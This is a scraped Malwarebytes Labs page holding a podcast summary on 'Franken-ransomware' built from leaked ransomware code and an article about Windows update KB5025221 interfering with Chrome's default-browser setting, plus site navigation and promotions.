The post The rise of "Franken-ransomware," with Allan Liska: Lock and Code S04E11  appeared first on Malwarebytes Labs.

Ransomware is becoming bespoke, and that could mean trouble for businesses and law enforcement investigators. 

It wasn't always like this. 

For a few years now, ransomware operators have congregated around a relatively new model of crime called "Ransomware-as-a-Service." In the Ransomware-as-a-Service model, or RaaS model, ransomware itself is not delivered to victims by the same criminals that make the ransomware. Instead, it is used almost "on loan" by criminal groups called "affiliates" who carry out attacks with the ransomware and, if successful, pay a share of their ill-gotten gains back to the ransomware’s creators.

This model allows ransomware developers to significantly increase their reach and their illegal hauls. By essentially leasing out their malicious code to smaller groups of cybercriminals around the world, the ransomware developers can carry out more attacks, steal more money from victims, and avoid any isolated law enforcement action that would put their business in the ground, as the arrest of one affiliate group won't stop the work of dozens of others. 

And not only do ransomware developers lean on other cybercriminals to carry out attacks, they also rely on an entire network of criminals to carry out smaller, specialized tasks. There are "Initial Access Brokers" who break into company networks and then sell that illegal method of access online. "You also have coders that you can contract out to," Liska said. "You have pen testers that you can contract out to. You can contract negotiators if you want. You can contract translators if you want."

But as Liska explained, as the ransomware "business" spreads out, so do new weak points: disgruntled criminals. 

"This whole underground marketplace that exists to serve ransomware means that your small group can do a lot," Liska said. "But that also means that you are entrusting the keys to your kingdom to these random contractors that you're paying in Bitcoin every now and then. And that, for example, is why the LockBit code got leaked—dude didn't pay his contractor."

With plenty of leaked code now circulating online, some smaller cybercriminals gangs have taken to making minor alterations and then sending that new variant of ransomware out into the world—no affiliate model needed.  

> "Most of what we see is just repurposed code and we see a lot of what I call 'Franken-ransomware.'" 

Today, on the Lock and Code podcast with host David Ruiz, Liska explains why Franken-ransomware poses unique challenges to future victims, cybersecurity companies, and law enforcement investigators. 

Tune in today.

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

The rise of "Franken-ransomware," with Allan Liska: Lock and Code S04E11 

Categories: News
The most interesting security related news of the week from May 1 till 7



(Read more...)




The post A week in security (May 1 - 7) appeared first on Malwarebytes Labs.

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows

Mac

iOS

Android

VPN Connection

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

FOR PARTNERS

Managed Service Provider (MSP) Program

Resellers

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (May 1 - 7)

Categories: News
Tags: Chrome

Tags:  Windows

Tags:  Edge

Tags:  browser

Tags:  update

Tags:  Microsoft

Tags:  default

Tags:  install

We take a look at trouble brewing in browser land after a controversial Windows update leaves Chrome fans without a useful feature.



(Read more...)




The post Microsoft vs Google spat sees users rolling back security updates to fix browser issues appeared first on Malwarebytes Labs.

We like to imagine we’re in total control of our desktop experience, carefully curated to look and work the way we want it to. However, every so often a story comes along which reminds us how little control we have when the big players notice one another's existence. A recent Windows update really wants you to use Edge instead of rival browsers, to the extent that some features in those rival browsers are breaking.

A lot of people will only ever use Microsoft's default Edge browser to download another browser they'd rather use. Last year, Chrome made some changes to how you go about making it your default browser, after you've downloaded it with Edge. One "Default" button to press, and boom…your default browser is set to Chrome without having to dig around in your system settings.

This is how things should work, and for a while they did! As Gizmodo notes, this was not to be the case for long.

Microsoft released update KB5025221 last month, and users of Chrome quickly began to flag peculiar experiences. From a Reddit user:

> If Chrome is set as the default browser, clicking on the link shortcut will open the link in chrome, but also open the Windows settings on the default apps. Anyone know where this behaviour comes from? It doesn't happen if we change the default browser to Edge.

Elsewhere, we have a thread about how someone’s 600 business devices all exhibit the same behaviour:

> Opening chrome causes default app settings to open each and every time. After today's cumulative update for Windows 10 and 11, 2023-04, every time I open Chrome the default app settings of windows will open. I've tried many ways to resolve this without luck. This is happening to all 600 systems with the update. Removing the update makes the issue go away. Anyone else having this issue? This does not occur when opening edge or brave browser, only Chrome for us.

A quick glance at the replies illustrates that Todd isn’t the only one impacted, as well as presenting the solution:

> Good morning Todd, We're having the same issue through our organization as well. We're on Windows 10 machines and pushed updates the last couple days. Many machines here seeing the issue. We may have just found a fix. Remove the Security Update KB5025221 and restart, this removes the problem. Looks to have fixed several machines just these last few minutes. May need to block KB5025221 until it's reissued.

Yes, to prevent this behaviour you had to make a decision on removing cumulative security updates. What did KB5025221 offer users? That would be fixes for no fewer than “ten issues that could lead to crashes, compatibility problems, and bugs in the operating system”. Would people really want to gamble by removing such a thing in order to prevent the aggravating system popups when opening Chrome?

It seems not, looking at the various replies to threads on this posted to Reddit and elsewhere. Informing users of the reason for the popups was the more sensible course of action on display. Even so, the mere possibility of people considering removing security updates to fix browser wars (intentional or otherwise) is a terrible position to find yourself in. Even without having to decide what to keep or remove because competing programs on your desktop may be having a fist fight, there are other aspects at play.

Way back in 2004, adware giants Direct Revenue went head to head in a court of law with ad company Avenue Media. The spectacularly named article “Adware cannibals feast on each other” describes how adware vendors thirsty for profit battled for desktop supremacy. The infamous Direct Revenue was accused of detecting the presence of rivals and attempting to uninstall them from PCs. This involved killing a competitor’s program and deleting registry entries to prevent it coming back to life. Indeed, from the Direct Revenue user agreement:

> You further understand and agree, by installing the software, that the software may, without any further prior notice to you, remove, disable or render inoperative other adware programs resident on your computer.

Considering just one Direct Revenue product like Aurora could make a system keel over, the last thing you’d want is half a dozen competing products all playing whack-a-mole with registry entries and who knows what else.

This is, of course, an extreme example from a very extreme time. Aggravating system popups and browser frustrations are not on the same level. Pondering update rollbacks, however, could direct us to such a place by means of another route. It’s to everyone’s benefit if these battles _don’t_ spark the digital touch paper.

For now, Chrome’s default button has been removed as a result of this most recent Windows update. All this, on top of aggravating pop up messages, space hogging adverts, and overly complicated user actions being required just to make a decision. We’ll have to wait and see what happens next in the battle of the browsers. It’s not quite at the “whoever wins, we lose” stage but it’s hard to argue a case where any of this benefits the people using these products.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Tag

#mac